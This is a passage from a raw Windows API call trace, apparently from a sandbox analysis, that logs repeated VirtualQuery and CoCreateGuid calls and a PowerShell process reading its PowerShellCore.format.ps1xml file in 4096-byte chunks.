Protect=0x4, Type=0x20000)) returned 0x1c [0052.931] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.931] VirtualQuery (in: lpAddress=0x14d42c, lpBuffer=0x14e42c, dwLength=0x1c | out: lpBuffer=0x14e42c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x844eb57a, Data2=0xedfa, Data3=0x4e4c, Data4=([0]=0xb5, [1]=0x7, [2]=0xef, [3]=0xef, [4]=0x4d, [5]=0xa0, [6]=0xf2, [7]=0xf1))) returned 0x0 [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2a7e6189, Data2=0x4343, Data3=0x4871, Data4=([0]=0xac, [1]=0x70, [2]=0xf5, [3]=0x8d, [4]=0xe4, [5]=0x52, [6]=0x67, [7]=0xd5))) returned 0x0 [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x99d5b00b, Data2=0x20ad, Data3=0x4b63, Data4=([0]=0x80, [1]=0xbe, [2]=0x59, [3]=0xe2, [4]=0x7c, [5]=0x4, [6]=0x49, [7]=0x73))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x23354fc8, Data2=0xbf31, Data3=0x494d, Data4=([0]=0x99, [1]=0x5b, [2]=0xad, [3]=0xeb, [4]=0x3, [5]=0xc8, [6]=0xf4, [7]=0x9a))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd7c8929e, Data2=0x163b, Data3=0x4c25, Data4=([0]=0xba, [1]=0xd6, [2]=0xb4, [3]=0x3e, [4]=0xd8, [5]=0xd5, [6]=0x49, [7]=0x9d))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa070b0c1, Data2=0xf3b1, Data3=0x4483, Data4=([0]=0x8b, [1]=0xff, [2]=0x27, [3]=0x11, [4]=0x5f, [5]=0x5d, [6]=0x4a, [7]=0xc5))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7541758e, Data2=0x16fc, Data3=0x4a52, Data4=([0]=0x96, [1]=0x36, [2]=0xe, [3]=0x47, 
[4]=0xc7, [5]=0xd1, [6]=0x66, [7]=0xf9))) returned 0x0 [0052.934] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcb7a2363, Data2=0x96f, Data3=0x4b92, Data4=([0]=0xb3, [1]=0xe4, [2]=0xa1, [3]=0x5a, [4]=0xed, [5]=0x1d, [6]=0xbb, [7]=0x4a))) returned 0x0 [0052.934] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.934] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.934] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, 
Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, 
RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.938] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcc5fd960, Data2=0xc5ec, Data3=0x45b9, Data4=([0]=0xa7, [1]=0xe2, [2]=0xb5, [3]=0xa4, [4]=0x17, [5]=0x2e, [6]=0x3, [7]=0x32))) returned 0x0 [0052.938] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, 
RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.939] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.940] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, 
AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d654, lpBuffer=0x14e654, dwLength=0x1c | out: lpBuffer=0x14e654*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.941] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: 
lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.942] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xdbbd2c5d, Data2=0xe5fe, Data3=0x4bec, Data4=([0]=0xa9, [1]=0x75, [2]=0x68, [3]=0x11, [4]=0x62, [5]=0x7e, [6]=0x9a, [7]=0xf))) returned 0x0 [0052.943] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.943] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: 
lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.944] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.945] VirtualQuery (in: lpAddress=0x14d628, 
lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xda391b8a, Data2=0xa1f, Data3=0x433c, Data4=([0]=0x97, [1]=0x41, [2]=0xf5, [3]=0x1c, [4]=0x6a, [5]=0x78, [6]=0x1b, [7]=0xe0))) returned 0x0 [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x651de7ac, Data2=0xec0f, Data3=0x44d6, Data4=([0]=0x9f, [1]=0x87, [2]=0x6f, [3]=0xc1, [4]=0xd0, [5]=0x57, [6]=0x4b, [7]=0xa3))) returned 0x0 [0052.946] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb7cc606a, Data2=0xfa9, Data3=0x4b16, Data4=([0]=0xb4, [1]=0x9e, [2]=0xc9, [3]=0x86, [4]=0xd4, [5]=0x23, [6]=0x29, [7]=0xe7))) returned 0x0 [0052.947] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xbe2fe86c, Data2=0x3f1b, Data3=0x40a8, Data4=([0]=0xb5, [1]=0x22, [2]=0xcf, [3]=0x7e, [4]=0x8d, [5]=0x20, [6]=0xdc, [7]=0xb1))) returned 0x0 [0052.947] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2bb7b865, Data2=0x3f2c, Data3=0x4813, Data4=([0]=0x8a, [1]=0xe5, [2]=0x29, [3]=0x75, [4]=0x58, 
[5]=0x78, [6]=0xec, [7]=0x11))) returned 0x0 [0052.948] VirtualQuery (in: lpAddress=0x14d55c, lpBuffer=0x14e55c, dwLength=0x1c | out: lpBuffer=0x14e55c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.948] VirtualQuery (in: lpAddress=0x14d598, lpBuffer=0x14e598, dwLength=0x1c | out: lpBuffer=0x14e598*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9803a797, Data2=0x45a7, Data3=0x4a33, Data4=([0]=0x8f, [1]=0x4e, [2]=0x90, [3]=0x48, [4]=0xcd, [5]=0x2, [6]=0xe3, [7]=0x71))) returned 0x0 [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x22de3bb5, Data2=0xff5f, Data3=0x49e9, Data4=([0]=0x9a, [1]=0xe3, [2]=0xf9, [3]=0x6b, [4]=0xe5, [5]=0x3b, [6]=0x3b, [7]=0x42))) returned 0x0 [0052.948] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x16416e97, Data2=0x555f, Data3=0x4b18, Data4=([0]=0x9d, [1]=0xd7, [2]=0x83, [3]=0xd, [4]=0x92, [5]=0xb9, [6]=0xdc, [7]=0x6a))) returned 0x0 [0052.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.948] GetLastError () returned 0x0 [0052.948] SetErrorMode (uMode=0x1) returned 0x1 [0052.949] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.949] GetLastError () returned 0x0 
[0052.949] GetFileType (hFile=0x2f8) returned 0x1 [0052.949] SetErrorMode (uMode=0x1) returned 0x1 [0052.949] GetFileType (hFile=0x2f8) returned 0x1 [0052.949] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.955] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.956] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.956] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 
[0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.957] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.958] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, 
